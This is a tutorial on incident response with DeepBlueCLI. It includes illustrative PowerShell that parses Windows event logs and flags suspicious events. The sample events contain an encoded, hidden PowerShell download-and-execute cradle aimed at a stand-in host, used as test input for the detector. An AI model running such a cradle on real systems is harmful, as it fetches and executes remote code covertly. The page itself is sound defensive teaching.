Endpoint Incident Response using DeepBlueCLI
DeepBlueCLI, by Eric Conrad, is a PowerShell module for threat hunting and incident response that works from Windows Event Logs.
From an incident response perspective, identifying patient zero during an incident or infection is just the tip of the iceberg. A responder must gather evidence, artifacts, and data from the compromised systems, and having the right tool to do so is a must. A tool like DeepBlueCLI automates the collection and parsing of event-log evidence, which shortens the time needed to scope and resolve the incident.
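To make the approach concrete, here is an added example of the kind of event-log hunt DeepBlueCLI performs. This is illustrative code written for this page, not DeepBlueCLI's own source: it normalises Security/System events from a live log or a saved .evtx file and flags a handful of well-known IR signals (log cleared, new local user, local group membership change, new service, encoded or unusually long command lines). The function names, the chosen event IDs and thresholds, and the sample events at the bottom are all assumptions made for the example.

```powershell
# Added example in the spirit of DeepBlueCLI; not the project's own code.
# Reads Security/System events from a live log or a saved .evtx, normalises
# the EventData fields, and flags a few classic incident-response signals.

function Get-NormalizedEvents {
    param(
        [string]$LogName,                          # e.g. 'Security' (live log)
        [string]$Path,                             # or a saved .evtx file
        [int[]]$Ids = @(1102, 4688, 4720, 4732, 7045)   # IDs chosen for this example
    )
    $filter = @{ Id = $Ids }
    # Get-WinEvent accepts either LogName or Path in the filter, not both
    if ($Path) { $filter.Path = $Path } else { $filter.LogName = $LogName }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # EventData fields are only reliably available from the event XML
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{ Time = $_.TimeCreated; Id = $_.Id; Data = $data }
    }
}

function Find-SuspiciousEvents {
    param([Parameter(ValueFromPipeline)][pscustomobject]$Event)
    process {
        $d   = $Event.Data
        $msg = $null
        switch ($Event.Id) {
            1102 { $msg = 'Security log cleared' }
            4720 { $msg = "New user created: $($d.TargetUserName) by $($d.SubjectUserName)" }
            4732 { $msg = "Member added to local group $($d.TargetUserName): $($d.MemberName)" }
            7045 { $msg = "New service installed: $($d.ServiceName) -> $($d.ImagePath)" }
            4688 {
                # Requires process command-line auditing to be enabled, otherwise
                # CommandLine is empty. Both checks are heuristics, not proof.
                $cmd = [string]$d.CommandLine
                if ($cmd -match '(?i)-e[a-z]*\s+[A-Za-z0-9+/=]{40,}') {
                    $msg = "Encoded PowerShell command: $cmd"
                } elseif ($cmd.Length -gt 1000) {
                    $msg = "Unusually long command line ($($cmd.Length) chars)"
                }
            }
        }
        if ($msg) { [pscustomobject]@{ Time = $Event.Time; Id = $Event.Id; Finding = $msg } }
    }
}

# Constructed sample events (not real log data) so the hunt can be tried
# without a Windows event log at hand. On a live system use instead:
#   Get-NormalizedEvents -LogName Security | Find-SuspiciousEvents
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'))
$sample = @(
    [pscustomobject]@{ Time = '2024-01-01T10:00:00'; Id = 4688
                       Data = @{ CommandLine = 'notepad.exe C:\notes.txt' } }
    [pscustomobject]@{ Time = '2024-01-01T10:01:00'; Id = 4688
                       Data = @{ CommandLine = "powershell.exe -nop -w hidden -enc $encoded" } }
    [pscustomobject]@{ Time = '2024-01-01T10:02:00'; Id = 4720
                       Data = @{ TargetUserName = 'svc_backup'; SubjectUserName = 'Administrator' } }
    [pscustomobject]@{ Time = '2024-01-01T10:03:00'; Id = 1102; Data = @{} }
)

# Three of the four constructed events should be reported (notepad is benign)
$sample | Find-SuspiciousEvents | Format-Table -AutoSize

# Preserve findings as evidence alongside the raw .evtx you collected
$sample | Find-SuspiciousEvents | Export-Csv -NoTypeInformation -Path .\findings.csv
```

DeepBlueCLI itself is invoked in the same two modes, against a live log (`.\DeepBlue.ps1 -log security`) or against a saved file (`.\DeepBlue.ps1 .\path\to\file.evtx`), and ships with a much larger set of checks than the five above. The point of the hand-rolled version is to show what the tool is doing underneath: pulling structured EventData out of the log, then applying detection rules to it, so a responder can review and extend those rules rather than treat the output as a black box.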